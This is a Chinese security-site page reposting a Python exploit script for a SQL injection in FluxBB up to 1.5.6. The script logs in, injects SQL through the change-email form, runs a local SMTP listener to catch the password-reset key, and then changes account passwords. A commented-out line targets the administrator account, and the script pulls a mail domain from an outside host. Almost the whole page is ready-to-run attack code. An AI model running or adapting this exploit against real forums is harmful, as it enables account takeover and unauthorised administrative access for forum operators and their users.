首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
FluxBB < 1.5.6 - SQL Injection
来源:vfocus.net 作者:secthrowaway 发布时间:2018-10-15  
#!/usr/bin/env python
# Friday, November 21, 2014 - secthrowaway () safe-mail net
# FluxBB <= 1.5.6 SQL Injection
# make sure that your IP is reachable
 
url  = 'http://target.tld/forum/'
user = 'user' # dummy account
pwd  = 'test'
 
import urllib, sys, smtpd, asyncore, re, sha
from email import message_from_string
from urllib2 import Request, urlopen
 
ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"
bindip = '0.0.0.0'
 
def stage1(sql):
    if len(sql) > 80:
        sys.exit('SQL too long, max 80 chars')
    print "1st stage: %s (%d chars)" % (sql, len(sql))
    r = urlopen(Request('%sprofile.php?action=change_email&id=%s' % (url, uid), data="form_sent=1&req_new_email=%s&req_password=%s&new_email=Submit" % (urllib.quote(sql), pwd), headers={"Referer": "%sprofile.php" % url, "User-agent": ua, "Cookie": cookie})).read()
    if 'An email has been sent to the specified address' not in r:
        sys.exit('err')
 
def stage3(key):
    print "3rd stage, using key: %s" % key
    r = urlopen(Request('%sprofile.php?action=change_pass&id=%s&key=%s' % (url, uid, key), headers={"User-agent": ua})).read()
    if 'Your password has been updated' in r:
        print 'success'
    else:
        print 'err'
 
class stage2_smtp(smtpd.SMTPServer):
    def process_message(self, peer, mailfrom, rcpttos, data):
        print '2nd stage: got mail', peer, mailfrom, "to:", rcpttos
        key = re.search("(https?://.*&key=([^\s]+))", message_from_string(data).get_payload(decode=True), re.MULTILINE)
        if key is not None:
            raise asyncore.ExitNow(key.group(2))
        return
 
def login():
    print "logging in"
    r = urlopen(Request('%slogin.php?action=in' % url, data="form_sent=1&req_username=%s&req_password=%s" % (user, pwd), headers={"User-agent": ua}))
    try:
        t = r.info()['set-cookie'].split(';')[0]
        return (t.split('=')[1].split('%7C')[0], t)
    except:
        sys.exit('unable to login, check user/pass')
 
uid, cookie = login()
 
email_domain = urlopen(Request('http://tns.re/gen')).read()
print "using domain: %s" % email_domain
 
#this will change your password to your password :)
stage1('%s\'/**/where/**/id=%s#@%s' % (sha.new(pwd).hexdigest(), uid, email_domain))
 
#this will change admin's (uid=2) password "123456"
#stage1('%s\'/**/where/**/id=%s#@%s' % (sha.new("123456").hexdigest(), 2, email_domain))
 
try:
    print "2nd stage: waiting for mail"
    server = stage2_smtp((bindip, 25), None)
    asyncore.loop()
except asyncore.ExitNow, key:
    stage3(key)
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Phoenix Contact WebVisit 29857
·NoMachine 5.3.26 Remote Code E
·Phoenix Contact WebVisit 6.40.
·Solaris RSH Stack Clash Privil
·Microsoft SQL Server Managemen
·Snes9K 0.0.9z - Buffer Overflo
·Microsoft SQL Server Managemen
·FLIR AX8 Thermal Camera 1.32.1
·Microsoft SQL Server Managemen
·FLIR Brickstream 3D+ - RTSP St
·VLC Media Player 2.2.8 MKV Use
·Academic Timetable Final Build
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved